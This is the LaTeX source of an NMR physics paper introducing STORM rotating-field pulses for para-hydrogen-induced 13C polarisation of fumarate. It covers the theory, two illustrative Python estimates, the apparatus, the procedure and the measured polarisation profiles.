For the case of hydrogenative-PHIP (considered here) the \emph{para}\xspace-enriched hydrogen gas (\emph{para}\xspace-hydrogen) is allowed to react with a suitable precursor molecule. Upon hydrogenation the nuclear singlet order of the hydrogen gas is carried over to the product molecule. However, the resulting nuclear singlet order located on the product molecule is NMR silent. Efficient conversion of nuclear singlet order into observable magnetization is thus an integral part of the method.
A number of techniques already exist for this purpose, both at high and low magnetic fields~\cite{johannesson_transfer_2004,theis_light-sabre_2014,theis_microtesla_2015,cavallari_effects_2015,eills_polarization_2019,bengs_robust_2020,devience_homonuclear_nodate,rodin_constant-adiabaticity_2021-1,rodin_constant-adiabaticity_2021,knecht_rapid_2021,dagys_low-frequency_2021,dagys_nuclear_2021}. High field methods benefit from the usual advantages, spectral separation between hetero- and homonuclei, strong pulse schemes with error compensation and applicability to a broad class of molecular systems~\cite{devience_preparation_2013,pravdivtsev_highly_2014,bengs_robust_2020,dagys_nuclear_2021,theis_light-sabre_2014,haake_efficient_1996}. However, these benefits often come at a price. Some technical challenges may arise due to additional relaxation phenomena and coherent leakage, which may lead to significant polarization losses~\cite{rodin_constant-adiabaticity_2021-1,knecht_mechanism_2018, knecht_indirect_2019}.
Some of these issues may be circumvented at low magnetic fields~\cite{johannesson_transfer_2004,cavallari_effects_2015,eills_polarization_2019,rodin_constant-adiabaticity_2021,rodin_constant-adiabaticity_2021-1,knecht_rapid_2021}. This has been utilised to produce large quantities of chemically pure and hyperpolarized (1-\ensuremath{{}^{13}\mathrm{C}}\xspace)fumarate, for example~\cite{knecht_rapid_2021}. The reaction was carried out inside a pressurised metal reactor, which itself was placed inside a magnetic shield. The polarization transfer was performed by sweeping the magnetic field in the sub-microtesla regime. Such a setup would be impossible at high magnetic fields as the reaction vessel is incompatible with pulsed radio-frequency methods.
We have recently demonstrated that efficient polarisation transfer may also be performed in the presence of a weak static magnetic field superimposed with a weak oscillating low field (WOLF) along the same direction~\cite{dagys_low-frequency_2021}. A magnetic field geometry with the oscillating field applied along the same direction as the main magnetic field is unusual for NMR, indeed if the oscillating field is applied in the conventional transverse plane the WOLF pulse becomes ineffective.
Generally speaking, the description of oscillating fields in the low magnetic field regime is complicated. In contrast to high field experiments both the resonant part and the counter-rotating part of the linearly polarised field have to be considered~\cite{meriles_high-resolution_2004, sakellariou_nmr_2005}. However, \blue{at low magnetic fields it is technically trivial} to generate rotating magnetic fields that are resonant with the nuclear spin transition frequencies. This way perturbations due to the counter-rotating components are simply avoided.
In this work we demonstrate that the application of transverse rotating fields may be exploited for the polarisation transfer step in PHIP experiments. The application of a suitable STORM (Singlet-Triplet Oscillations through Rotating Magnetic fields) pulse enables polarisation transfer from the singlet pair to a heteronucleus leading to substantially enhanced NMR signals. We validate some of these concepts experimentally by generating hyperpolarized (1-\ensuremath{{}^{13}\mathrm{C}}\xspace)fumarate, and explore the STORM condition as a function of the bias field, rotation frequency and sense of rotation.
We find that driving spin transitions with a rotating magnetic field in low magnetic fields requires unusually high rotation frequencies, sometimes several kHz. This is in contrast to typical zero-to-ultralow field experiments which involve frequencies on the order of several Hz at most~\cite{pileio_extremely_2009,sjolander_13c-decoupled_2017,sjolander_transition-selective_2016}. The observed polarization levels are comparable to other low-field techniques~\cite{rodin_constant-adiabaticity_2021,rodin_constant-adiabaticity_2021-1,knecht_rapid_2021,dagys_low-frequency_2021}. However, we provide numerical evidence that the STORM method greatly outperforms several existing techniques in the presence of fast relaxing quadrupolar nuclei, such as deuterium for example. The STORM method might therefore represent a simple solution to quadrupolar decoupled polarisation transfer at low magnetic fields~\cite{birchall_quantifying_2020,tayler_scalar_2019}.
\section{Theory}
\label{sec:theory}
Consider an ensemble of nuclear three-spin-1/2 systems consisting of two nuclei of isotopic type $I$ and a third nucleus of isotopic type $S$. The nuclei are characterised by the magnetogyric ratios $\gamma_I$ and $\gamma_S$, respectively.
For an isotropic solution, the nuclei mutually interact by scalar spin-spin coupling terms
\begin{equation}
\begin{aligned}
H_{J} = H_{II}+H_{IS},
\end{aligned}
\end{equation}
where the Hamiltonian $H_{II}$ describes the homonuclear couplings
\begin{equation}
\begin{aligned}
H_{II}=2\pi J_{12}{\bf I}_1\cdot{\bf I}_2
\end{aligned}
\end{equation}
and the Hamiltonian $H_{IS}$ describes the heteronuclear couplings
\begin{equation}
\begin{aligned}
H_{IS}=
2\pi J_{13}{\bf I}_1\cdot{\bf S}
+2\pi J_{23}{\bf I}_2\cdot{\bf S}.
\end{aligned}
\end{equation}
For the remainder of the discussion we assume the coupling constants $J_{13}$ and $J_{23}$ to be different ($J_{13}\neq J_{23}$) and \blue{a positive homonuclear coupling constant $J_{12}$. The heteronuclear $J$ coupling Hamiltonian may be split} in its symmetric and anti-symmetric part
\begin{equation}
\begin{aligned}
H_{IS}=H^{\Sigma}_{IS}+H^{\Delta}_{IS},
\end{aligned}
\end{equation}
with
\begin{equation}
\begin{aligned}
&H^{\Sigma}_{IS}=\pi(J_{13}+J_{23})({\bf I}_1+{\bf I}_2)\cdot {\bf S},
\\
&H^{\Delta}_{IS}=\pi(J_{13}-J_{23})({\bf I}_1-{\bf I}_2)\cdot {\bf S}.
\end{aligned}
\end{equation}
\input{Figures/Energies}
The nuclear spin ensemble may further be manipulated by the application of external magnetic fields. The magnetic field Hamiltonian is constructed by coupling the spin angular momenta to the external magnetic field, taking their respective magnetogyric ratios into account
\begin{equation}
\begin{aligned}
H_{M}(t)=-\gamma_I {\bf B}(t)\cdot({\bf I}_{1}+{\bf I}_{2})-\gamma_S {\bf B}(t)\cdot{\bf S}.
\end{aligned}
\end{equation}
The total spin Hamiltonian is then given by
\begin{equation}
\begin{aligned}
H(t)=H_{J}+H_{M}(t).
\end{aligned}
\end{equation}
\subsection{Rotating field Hamiltonian}
\input{Figures/LACs}
Consider now the application of a time-dependent rotating magnetic field in the presence of a weak bias field along the laboratory frame $z$-axis. The $z$-bias Hamiltonian is given by
\begin{equation}
\begin{aligned}
H_{\rm bias}
&=-\gamma_I B_{\rm bias} (I_{1z}+I_{2z})-\gamma_S B_{\rm bias} S_{z}
\\
&=\omega^{I}_{0}(I_{1z}+I_{2z})+\omega^{S}_{0} S_{z},
\end{aligned}
\end{equation}
whereas the rotating magnetic field Hamiltonian is given by
\begin{equation}
\begin{aligned}
H_{\rm rot}(t)
=&B_{\rm rot} \cos(\omega_{\rm rot} t)(-\gamma_I (I_{1x}+I_{2x})-\gamma_S S_{x})
\\
-&B_{\rm rot} \sin(\omega_{\rm rot} t)(-\gamma_I (I_{1y}+I_{2y})-\gamma_S S_{y}).
\end{aligned}
\end{equation}
The total spin Hamiltonian may now be expressed as a combination of scalar-coupling terms, the bias term and the rotating field contribution
\begin{equation}
\begin{aligned}
H(t)=H_{J}+H_{M}(t)=H_{J}+H_{\rm bias}+H_{\rm rot}(t).
\end{aligned}
\end{equation}
It turns out to be advantageous to isolate the rotating part of $H(t)$. To this end we consider an interaction frame transformation rotating all three spins equally around the laboratory frame $z$-axis. The angular frequency is chosen to coincide with $\omega_{\rm rot}$
\begin{equation}
\begin{aligned}
K_{z}(t)=\exp\{-{i\mkern1mu} (I_{1z}+I_{2z}+S_{z})\omega_{\rm rot} t\}.
\end{aligned}
\end{equation}
The corresponding interaction frame Hamiltonian $\tilde{H}(t)$ is given by
\begin{equation}
\begin{aligned}
\tilde{H}=
&K_{z}(t)H(t)K_{z}(-t)+{i\mkern1mu} \dot{K}_{z}(t)K_{z}(-t)
\\
=&H_J+\omega^{I}_{1}(I_{1x}+I_{2x})+\omega^{S}_{1} S_{x}
\\
+&(\omega^{I}_{0}+\omega_{\rm rot})(I_{1z}+I_{2z})+(\omega^{S}_{0}+\omega_{\rm rot})S_{z},
\end{aligned}
\end{equation}
which has the advantage of being time-independent.
\subsection{Effective field Hamiltonian}
Within the interaction frame the spins evolve under a new effective magnetic field $B_{\rm eff}$. The coupling of the effective field to the $I$ and $S$ spins may be characterised by the effective nutation frequencies $\omega_{\rm eff}^{X}$
\begin{equation}
\label{eq:omega_eff}
\begin{aligned}
&\omega_{\rm eff}^{X}=\sqrt{(\omega^{X}_{0}+\omega_{\rm rot})^{2}+(\omega^{X}_{1})^{2}},
\end{aligned}
\end{equation}
and the polar angles $\theta_{\rm eff}^{X}$
\begin{equation}
\begin{aligned}
&\theta_{\rm eff}^{X}=\arctantwo(\omega^{X}_{0}+\omega_{\rm rot},\omega^{X}_{1}).
\end{aligned}
\end{equation}
The polar angles describe the field direction with respect to the laboratory frame $z$-axis. An alternative representation of $\tilde{H}$ is thus given by
\begin{equation}
\label{eq:H_tilde}
\begin{aligned}
\tilde{H}= XH_{\rm eff}X^{\dagger}+H^{\Delta}_{IS},
\end{aligned}
\end{equation}
where $H_{\rm eff}$ represents the effective field Hamiltonian in the absence of the anti-symmetric heteronuclear $J$-couplings
\begin{equation}
\label{eq:H_eff}
\begin{aligned}
H_{\rm eff}= \omega_{\rm eff}^{I}(I_{1z}+I_{2z})+\omega_{\rm eff}^{S}S_{z}+H_{II}+H^{\Sigma}_{IS}.
\end{aligned}
\end{equation}
The transformation $X$ is defined as a composite rotation of spins $I$ and $S$
\begin{equation}
\begin{aligned}
X=R^{12}_{y}(\theta_{\rm eff}^{I})R^{3}_{y}(\theta_{\rm eff}^{S}).
\end{aligned}
\end{equation}
Consider now the set of STZ states aligned along the effective magnetic field direction
\begin{equation}
\begin{aligned}
&\ket{T_{m}\mu^{'}}=X\ket{T_{m}\mu},
\\
&\ket{S_{0}\mu^{'}}=X\ket{S_{0}\mu}.
\end{aligned}
\end{equation}
These states are exact eigenstates of the effective field part of the interaction frame Hamiltonian
\begin{equation}
\begin{aligned}
XH_{\rm eff} X^{\dagger}\ket{T_{m}\mu^{'}}
=&XH_{\rm eff} X^{\dagger}X\ket{T_{m}\mu}
=\lambda X\ket{T_{m}\mu}
=\lambda\ket{T_{m}\mu^{'}},
\end{aligned}
\end{equation}
and similarly for $\ket{S_{0}\mu^{'}}$. The rotated STZ states thus represent the approximate eigenstates of $\tilde{H}$ and the heteronuclear coupling term $H^{\Delta}_{IS}$ may be considered a perturbation.
\subsection{Para-hydrogen Induced Polarisation}
\label{sec:PHIP}
For typical PHIP experiments involving $I_{2}S$ systems at sufficiently low magnetic fields we may approximate the initial state of the spin ensemble by pure singlet population
\begin{equation}
\begin{aligned}
\rho(0)=\ket{S_{0}}\bra{S_{0}}\otimes \frac{1}{2}\mathds{1}_{S},
\end{aligned}
\end{equation}
where $\mathds{1}_{S}$ represents the unity operator for spin $S$. Because the initial state of the ensemble is rotationally invariant we may express $\rho(0)$ in a straightforward manner in the rotated STZ basis
\begin{equation}
\label{eq:rho0}
\begin{aligned}
\rho(0)=\frac{1}{2}\left(\ket{S_{0}\alpha^{'}}\bra{S_{0}\alpha^{'}}+\ket{S_{0}\beta^{'}}\bra{S_{0}\beta^{'}}\right).
\end{aligned}
\end{equation}
In the absence of $H^{\Delta}_{IS}$ no heteronuclear magnetisation may be extracted out of the system, however the presence of $H^{\Delta}_{IS}$ causes coherent mixing within the manifolds $\{\ket{S_{0}\beta^{'}},\ket{T_{0}\alpha^{'}}, \ket{T_{-1}\alpha^{'}}\}$ and $\{\ket{S_{0}\alpha^{'}},\ket{T_{0}\beta^{'}}, \ket{T_{+1}\beta^{'}}\}$.
Strictly speaking these two manifolds are not completely isolated from all other states. But as illustrated in figure \ref{fig:lac} mixing of this type will be efficiently suppressed for our choice of the rotation frequency $\omega_{\rm rot}$. Taking the first manifold for example, one may show to first order in perturbation theory that the following inequalities are well satisfied
\begin{equation}
\label{eq:TLS_cond}
\begin{aligned}
&\vert\bra{T_{-1}\alpha^{'}}\tilde{H}\ket{n}\vert\ll\vert\bra{T_{-1}\alpha^{'}}\tilde{H}\ket{T_{-1}\alpha^{'}}-\bra{n}\tilde{H}\ket{n}\vert,
\\
&\vert\bra{T_{0}\alpha^{'}}\tilde{H}\ket{n}\vert\;\;\ll\vert\bra{T_{0}\alpha^{'}}\tilde{H}\ket{T_{0}\alpha^{'}}-\bra{n}\tilde{H}\ket{n}\vert,
\\
&\vert\bra{S_{0}\beta^{'}}\tilde{H}\ket{n}\vert\;\;\ll\vert\bra{S_{0}\beta^{'}}\tilde{H}\ket{S_{0}\beta^{'}}-\bra{n}\tilde{H}\ket{n}\vert,
\end{aligned}
\end{equation}
where $\ket{n}$ represents any state outside the manifold.
The energy separation between the $\ket{S_{0}\beta^{'}}$ and $\ket{T_{-1}\alpha^{'}}$ state is given by
\begin{equation}
\label{eq:delta_E}
\begin{aligned}
\Delta E
=\omega_{\rm eff}^{I}-\omega_{\rm eff}^{S}+2\pi\left(J_{12}-\frac{J_{13}+J_{23}}{4}\cos(\theta_{\rm eff}^{I}-\theta_{\rm eff}^{S})\right).
\end{aligned}
\end{equation}
As a result, coherent state mixing is maximised by choosing an optimised rotation frequency $\omega_\mathrm{STORM}$ such that
\begin{equation}
\begin{aligned}
\Delta E=0 \quad{\rm at}\quad\omega_{\rm rot}=\omega_\mathrm{STORM}.
\end{aligned}
\end{equation}
We refer to such a scenario as the application of a STORM pulse, which causes a degeneracy between the $\ket{S_{0}\beta^{'}}$ and $\ket{T_{-1}\alpha^{'}}$ state, and leads to a level anti-crossing (LAC) if the anti-symmetric heteronuclear $J$-couplings are included (see inset figure \ref{fig:lac})~\cite{rodin_representation_2020,messiah_albert_quantum_1962}.
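As a concrete numerical illustration, the STORM condition $\Delta E=0$ may be located by a simple root search over the rotation frequency using equations \ref{eq:omega_eff} and \ref{eq:delta_E}. In the Python sketch below the $J$-couplings and field amplitudes are illustrative assumptions rather than calibrated experimental values, and the angle convention is read as $\tan\theta_{\rm eff}^{X}=\omega_{1}^{X}/(\omega_{0}^{X}+\omega_{\rm rot})$ with $\omega_{0}^{X}=-\gamma_{X}B_{\rm bias}$ and $\omega_{1}^{X}=-\gamma_{X}B_{\rm rot}$:

```python
import math

# Illustrative parameters (assumptions, not the experimental calibration):
J12, J13, J23 = 15.8, 6.6, 3.2            # Hz, fumarate-like J-couplings
gI = 2 * math.pi * 42.577e6               # rad s^-1 T^-1, 1H
gS = 2 * math.pi * 10.708e6               # rad s^-1 T^-1, 13C
B_bias, B_rot = 0.5e-6, 4.0e-6            # T

def delta_E_hz(nu_rot):
    """Energy gap between |S0 beta'> and |T-1 alpha'> states, in Hz."""
    w_rot = 2 * math.pi * nu_rot
    dE, theta = 0.0, {}
    for X, g in (("I", gI), ("S", gS)):
        w0, w1 = -g * B_bias, -g * B_rot
        theta[X] = math.atan2(w1, w0 + w_rot)          # polar angle from z
        w_eff = math.hypot(w0 + w_rot, w1)             # effective nutation freq.
        dE += w_eff if X == "I" else -w_eff
    dE += 2 * math.pi * (J12 - (J13 + J23) / 4
                         * math.cos(theta["I"] - theta["S"]))
    return dE / (2 * math.pi)

# Bisection: the gap changes sign between 0.1 and 20 kHz for these parameters
lo, hi = 100.0, 20000.0
for _ in range(100):
    mid = 0.5 * (lo + hi)
    if delta_E_hz(lo) * delta_E_hz(mid) <= 0:
        hi = mid
    else:
        lo = mid
nu_storm = 0.5 * (lo + hi)
print(f"STORM rotation frequency: {nu_storm / 1000:.2f} kHz")
```

For these assumed values the root lands in the low-kHz range, consistent with the kHz-scale rotation frequencies noted in the introduction.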
As shown in the appendix
mixing between the $\ket{S_{0}\beta^{'}}$ and $\ket{T_{-1}\alpha^{'}}$ state occurs with frequency
\begin{equation}
\label{eq:wSTnut}
\begin{aligned}
\omega_{ST}^{\rm nut}
=&\sqrt{2}\pi\cos^{2}(\tfrac{1}{2}(\theta_{\rm eff}^{I}-\theta_{\rm eff}^{S}))
\\
\times&(\cos(\xi_{\rm ST})(J_{13}+J_{23})+\sin(\xi_{\rm ST})(J_{13}-J_{23})),
\end{aligned}
\end{equation}
where $\xi_{\rm ST}$ represents the mixing angle between the $\ket{S_{0}\beta^{'}}$ and $\ket{T_{0}\beta^{'}}$ state
\begin{equation}
\label{eq:xiST}
\begin{aligned}
\xi_{\rm ST}=\frac{1}{2}\arctantwo(-\frac{J_{12}}{2},\frac{J_{13}-J_{23}}{4} \cos(\theta_{\rm eff}^{I}-\theta_{\rm eff}^{S})).
\end{aligned}
\end{equation}
Application of a rotating magnetic field with \mbox{$\omega_{\rm rot}=\omega_\mathrm{STORM}$} causes the states $\ket{S_{0}\beta^{'}}$ and $\ket{T_{-1}\alpha^{'}}$ to approximately follow the dynamics of a two-level system (TLS).
Consider now starting from the density operator in equation \ref{eq:rho0}. The spin-state populations at time $\tau$ under the TLS approximation are given by~\cite{messiah_albert_quantum_1962}
\begin{align}
\label{eq:oscil}
&\bra{S_0\beta^{'}}\,\rho(\tau)\,\ket{S_0\beta^{'}} \simeq
\tfrac{1}{2}\left(1 + \cos(\omega_{ST}^\mathrm{nut} \tau)
\right),
\nonumber\\
&\bra{T_{-1}\alpha^{'}}\,\rho(\tau)\,\ket{T_{-1}\alpha^{'}} \simeq
\tfrac{1}{2}\left(1 - \cos(\omega_{ST}^\mathrm{nut} \tau)
\right).
\end{align}
A complete population inversion between the $\ket{S_{0}\beta^{'}}$ and $\ket{T_{-1}\alpha^{'}}$ state may be achieved by applying the STORM pulse for a duration $\tau^{*}=\pi/\omega_{ST}^\mathrm{nut}$. Since the STORM pulse is only resonant with the $\ket{S_{0}\beta^{'}}\leftrightarrow\ket{T_{-1}\alpha^{'}}$ transition all other states experience negligible evolution. The idealised density operator after such a STORM pulse is thus given by
\begin{equation}
\begin{aligned}
\rho(\tau^{*})
\simeq&\frac{1}{2}\left(\ket{S_{0}\alpha^{'}}\bra{S_{0}\alpha^{'}}+\ket{T_{-1}\alpha^{'}}\bra{T_{-1}\alpha^{'}}\right)
\\
=&\mathds{1}/8+\cos(\theta_{\rm eff}^{S}) S_{z}/4+{\rm orth.}\;{\rm operators},
\end{aligned}
\end{equation}
which indicates the generation of heteronuclear $S$ spin magnetisation proportional to $\cos(\theta_{\rm eff}^{S})$.
The state of the $S$ spins may be extracted by tracing over the $I$ spins of the system
\begin{equation}
\begin{aligned}
\rho_{S}(\tau^{*})={\rm Tr}_{I}\{\rho(\tau^{*})\}=&\mathds{1}/2+\cos(\theta_{\rm eff}^{S}) S_{z}.
\end{aligned}
\end{equation}
As a result, the heteronuclear spins become fully polarised as $\cos(\theta_{\rm eff}^{S})$ approaches unity. Representing the transfer amplitude in a slightly more intuitive form:
\begin{equation}
\begin{aligned}
\cos(\theta_{\rm eff}^{S})=\frac{\omega^{S}_{0}+\omega_{\rm rot}}{\sqrt{(\omega^{S}_{1})^{2}+(\omega^{S}_{0}+\omega_{\rm rot})^{2}}},
\end{aligned}
\end{equation}
one may see that this condition is met if the sum of the bias $S$ spin Larmor frequency and angular rotation frequency exceed the $S$ spin nutation frequency ($\vert\omega^{S}_{0}+\omega_{\rm rot}\vert\gg\vert\omega^{S}_{1}\vert$).
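The quantities above can be combined in a short numerical sketch estimating the pulse duration $\tau^{*}=\pi/\omega_{ST}^{\rm nut}$ from equations \ref{eq:wSTnut} and \ref{eq:xiST}, and the transfer amplitude $\cos(\theta_{\rm eff}^{S})$. All values below, including the rotation frequency assumed to sit near the STORM condition, are illustrative assumptions rather than experimental calibrations, and $\arctantwo$ is read with the standard $(y,x)$ argument order:

```python
import math

# Assumed illustrative parameters (not the experimental calibration):
J12, J13, J23 = 15.8, 6.6, 3.2        # Hz, fumarate-like J-couplings
gI = 2 * math.pi * 42.577e6           # rad s^-1 T^-1, 1H
gS = 2 * math.pi * 10.708e6           # rad s^-1 T^-1, 13C
B_bias, B_rot = 0.5e-6, 4.0e-6        # T
nu_rot = 5.3e3                        # Hz, assumed near the STORM condition

w_rot = 2 * math.pi * nu_rot
theta = {}
for X, g in (("I", gI), ("S", gS)):
    w0, w1 = -g * B_bias, -g * B_rot
    theta[X] = math.atan2(w1, w0 + w_rot)            # polar angle from z-axis

d_theta = theta["I"] - theta["S"]
xi = 0.5 * math.atan2(-J12 / 2, (J13 - J23) / 4 * math.cos(d_theta))
w_nut = (math.sqrt(2) * math.pi * math.cos(d_theta / 2) ** 2
         * (math.cos(xi) * (J13 + J23) + math.sin(xi) * (J13 - J23)))
tau_star = math.pi / abs(w_nut)                      # STORM pulse duration, s

w0S = -gS * B_bias
cos_thetaS = (w0S + w_rot) / math.hypot(w0S + w_rot, -gS * B_rot)
print(f"tau* = {tau_star * 1e3:.0f} ms, transfer amplitude = {cos_thetaS:.5f}")
```

With these assumed values the pulse duration comes out on the order of a hundred milliseconds, and the transfer amplitude is close to unity, since $\vert\omega^{S}_{0}+\omega_{\rm rot}\vert\gg\vert\omega^{S}_{1}\vert$ at kHz-scale rotation frequencies.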
Although much of the discussion above has focused on the $\{\ket{S_{0}\beta^{'}},\ket{T_{0}\alpha^{'}}, \ket{T_{-1}\alpha^{'}}\}$ manifold, similar results hold for the $\{\ket{S_{0}\alpha^{'}},\ket{T_{0}\beta^{'}}, \ket{T_{+1}\beta^{'}}\}$ manifold, the only difference being that the relevant energy difference has to be replaced by
\begin{equation}
\begin{aligned}
\Delta E_{(-)}
&=\omega_{\rm eff}^{I}-\omega_{\rm eff}^{S}-2\pi\left(J_{12}-\frac{J_{13}+J_{23}}{4}\cos(\theta_{\rm eff}^{I}-\theta_{\rm eff}^{S})\right),
\end{aligned}
\end{equation}
where the $(-)$ indicates that this transition will generally lead to negative heteronuclear magnetisation.
\section{\label{sec:Methods}Methods}
\subsection{\label{sec:Materials}Materials}
The precursor solution for fumarate was prepared by dissolving 100~mM disodium acetylene dicarboxylate, 100~mM sodium sulfite, and 6~mM $\mathrm{[RuCp^\ast(MeCN)_3]PF_6}$\xspace (CAS number: 99604-67-8) in D$_2$O, heating to 60\ensuremath{{}^{\circ}\mathrm{C}}\xspace, and passing through a Millex\textregistered\ 0.22~$\mu$m PES filter.
\emph{Para}\xspace-hydrogen was produced by passing hydrogen gas over an iron oxide catalyst packed in a 1/4 inch stainless steel tube cooled by liquid nitrogen, which results in a \emph{para}\xspace-enrichment level of 50\%.
About 2\% of the fumarate molecules contain a naturally-occurring \ensuremath{{}^{13}\mathrm{C}}\xspace nucleus. The two \ensuremath{{}^{1}\mathrm{H}}\xspace nuclei and the \ensuremath{{}^{13}\mathrm{C}}\xspace nucleus form a three-spin-1/2 system of the type discussed above. The $J$-coupling parameters for the molecular system are consistent with references~\citenum{bengs_robust_2020,dagys_low-frequency_2021}.
\subsection{\label{sec:Equipment}Equipment}
\input{Figures/Setup}
A sketch of the equipment is shown in figure~\ref{fig:setup}.
The hydrogen gas is bubbled through the solution using a 1/16 inch PEEK capillary tube inserted inside a thin-walled Norell\textregistered\ pressure NMR tube. The Arduino Mega 2560 micro-controller board was used to actuate the Rheodyne MXP injection valves as well as a power switch connected to the solenoid coil. The 50~cm long and 15~mm wide coil was designed to provide a 170~$\mu$T field piercing through the TwinLeaf~MS-4 mu-metal shield. The rotating magnetic field was generated by two 30~cm long orthogonal saddle coils using a Keysight 33500B waveform generator with two channels synchronised with phase difference of $\pm90^\circ$.
The bias field was generated by the built-in Helmholtz coil of the Twinleaf shield, powered by a Keithley 6200 DC current source.
\subsection{\label{sec:Procedure}Experimental Procedure}
Figure~\ref{fig:sequence} gives an overview of the experimental protocol including the magnetic field experienced by the sample as a function of time. Each experiment starts by heating 250\ensuremath{\,\mu\mathrm{L}}\xspace of the sample mixture to $\sim90 \ensuremath{{}^{\circ}\mathrm{C}}\xspace$ in the ambient magnetic field of the laboratory ($\sim$ 110~$\mu$T), followed by insertion into the magnetic shield where a solenoid coil generates a magnetic field of similar magnitude. \emph{Para}\xspace-enriched hydrogen gas is bubbled through the solution at 6 bar pressure for 30~seconds. The rotating field is generated constantly by the waveform generator, the amplitude is kept constant ($B_{\rm STORM}=4\ensuremath{\,\mu\mathrm{T}}\xspace$). The solenoid is switched off by a relay for a period $\tau$ to pre-set the bias field ($B_\mathrm{bias}$) and to mimic a STORM pulse. Afterwards the sample was removed manually and inserted into the Oxford 400~MHz magnet equipped with a Bruker Avance Neo spectrometer.
\input{Figures/Sequence}
The \ensuremath{{}^{13}\mathrm{C}}\xspace free-induction decays were initiated by a hard pulse of 14.7~kHz rf amplitude and recorded with 65~k point density at a spectral width of ~200~ppm. Additional \ensuremath{{}^{1}\mathrm{H}}\xspace decoupling was used for all experiments. Thermal equilibrium \ensuremath{{}^{13}\mathrm{C}}\xspace spectra were recorded at room temperature with a recycle delay of 120~s, averaging the signal over 512 transients.
\section{\label{sec:results}Results}
Figure~\ref{fig:spectra} shows single-transient hyperpolarized \ensuremath{{}^{13}\mathrm{C}}\xspace NMR spectra, obtained using the STORM procedure as a function of the rotational direction in the presence of a 0~T bias field (figure~\ref{fig:spectra}(a)) and a 2~$\mu$T bias field (figure~\ref{fig:spectra}(b)). In both cases the STORM pulse duration was set to 0.2~s with a peak amplitude of $B_{\rm STORM}=4~\mu$T. The rotation frequencies, 1150 Hz for (a) and 223 Hz for (b), correspond to the root of the equation~\ref{eq:delta_E}.
The observed \ensuremath{{}^{13}\mathrm{C}}\xspace polarization levels clearly depend upon the sense of rotation. At zero field the relevant LAC conditions for positive and negative \ensuremath{{}^{13}\mathrm{C}}\xspace magnetization are centred symmetrically around a zero rotation frequency. A simple inversion of the rotation frequency therefore enables selection of either positive and negative \ensuremath{{}^{13}\mathrm{C}}\xspace magnetization.
In the presence of a non-vanishing bias field the symmetry with respect to the rotation frequency is broken. This means that a single frequency can only match one condition and no signal is observed when the rotation is reversed (see Fig.~\ref{fig:spectra}(b)).
\input{Figures/Spectra}
\input{Figures/ZF_profiles}
\input{Figures/Profiles}
The solid black line in figure~\ref{fig:spectra}(a) represents a reference \ensuremath{{}^{13}\mathrm{C}}\xspace spectrum averaged over 512 transients. The spectrum was obtained on the hydrogenated sample after thermal equilibration. Comparison of these spectra allows an estimation of the \ensuremath{{}^{13}\mathrm{C}}\xspace polarization levels, which in this case corresponds to $p^{S}_{z}\simeq6\%$. These results are comparable with previous methods under similar experimental conditions.~\cite{eills_polarization_2019,rodin_constant-adiabaticity_2021,rodin_constant-adiabaticity_2021-1,dagys_low-frequency_2021} Significant improvements in the polarisation are expected by addressing few aspects of the setup. Fully enriched \emph{para}\xspace-hydrogen would lead to 3-fold enhancement, whereas careful optimization of the reaction conditions would further lead to a better polarization yield\cite{eills_polarization_2019,rodin_constant-adiabaticity_2021}. Some minimal losses could be also avoided by using a fully automated experimental procedure.
Integrated \ensuremath{{}^{13}\mathrm{C}}\xspace signal amplitudes as a function of the rotation frequency and the STORM pulse duration $\tau$ at bias field of 0~T and 2~$\mu$T are shown in figures~\ref{fig:zf_profiles}~and~\ref{fig:profiles}. Each experimental point was obtained from a separate experiment on a fresh sample. The experimental data has been normalised to unity to enable a qualitative comparison with numerical simulations and analytically derived curves based on equation~\ref{eq:oscil}. The agreement between both curves and the experimental data is gratifying.
The frequency profiles obtained at different bias fields display a significant change in their width.
At zero-field the full width at half maximum of the profile was estimated to be $\sim$350~Hz whereas at 2~$\mu$T bias field width got reduced to $\sim$5~Hz.
These matching conditions are much broader than the 0.4~Hz width observed in the profiles using the WOLF method~\cite{dagys_low-frequency_2021}. In agreement with the analytic expression given by equation~\ref{eq:wSTnut}, the polarisation transfer rate did not vary dramatically with an increase in the bias field. For both cases, equation~\ref{eq:wSTnut} correctly predicts the polarisation transfer rate to be approximately $\sim 2$~Hz, where we have used the \textit{J}-coupling parameters of fumarate given in refs~\citenum{bengs_robust_2020,dagys_low-frequency_2021}.
\section{Conclusions}
In this work we have studied the polarization transfer from singlet order to heteronuclear magnetization in the context of \emph{para}\xspace-hydrogen induced polarisation. The polarisation transfer is achieved through a combination of a rotating magnetic field and a small bias field.
Despite low values of the static bias field, the rotation frequency needed to drive the transfer is strikingly large. However, the principle of the method described here is rather intuitive and a simple explanation may be given within the framework of level-anti crossings, at least when the Hamiltonian is expressed within the interaction frame of the rotating magnetic field. Based on the LAC picture we were able to establish the resonance conditions for singlet-triplet mixing and determine the corresponding population transfer rate. In particular, we have shown that the rotational direction plays an important role in correctly establishing the resonance condition, and should be chosen carefully in the experimental context.
There are other methods to convert nuclear singlet order into heteronuclear polarization, including resonant pulse schemes in high field as well as magnetic field-cycling at low magnetic fields~\cite{johannesson_transfer_2004,theis_microtesla_2015,theis_light-sabre_2014,devience_homonuclear_nodate,rodin_constant-adiabaticity_2021-1,rodin_constant-adiabaticity_2021,cavallari_effects_2015,eills_polarization_2019,knecht_rapid_2021,dagys_low-frequency_2021,dagys_nuclear_2021,bengs_robust_2020}. The STORM method introduced here is conceptually simple and \blue{provides a few advantages} over other existing low field methods. The potential polarization losses caused by additional relaxation effects in high magnetic fields are entirely avoided with use of low magnetic fields~\cite{rodin_constant-adiabaticity_2021-1,knecht_mechanism_2018, knecht_indirect_2019}. \blue{However, at ultra-low fields quadrupolar nuclei such as $^2$H or $^{14}$N often act as polarization sinks, and may lead to a significant drops in the polarization transfer efficiency.}
\blue{The presence of quadrupolar nuclei is expected to be particularly disrupting to adiabatic field sweep methods, some of which are routinely utilised in the generation of hyperpolarised \mbox{(1-\ensuremath{{}^{13}\mathrm{C}}\xspace)fumarate}~\cite{rodin_constant-adiabaticity_2021,rodin_constant-adiabaticity_2021-1,knecht_rapid_2021}.}
\blue{In contrast to field sweep methods, the STORM method allows one to freely select the strength of magnetic fields as well as the rotation frequency.} \blue{It is thus conceivable that optimal conditions for the magnetic field strength and rotation frequency exist at which the $^2$H or $^{14}$N spins do not interfere with the polarisation transfer process.}
We therefore believe that STORM pulses represent promising candidates for a new class of quadrupolar decoupled polarization transfer methods in the near future. Applications to other hyperpolarization techniques such as PHIP-SABRE (Signal Amplification by Reversible Exchange) are also conceivable~\cite{adams_reversible_2009,theis_light-sabre_2014,theis_microtesla_2015,knecht_mechanism_2018}.
\section*{Conflicts of interest}
There are no conflicts to declare.
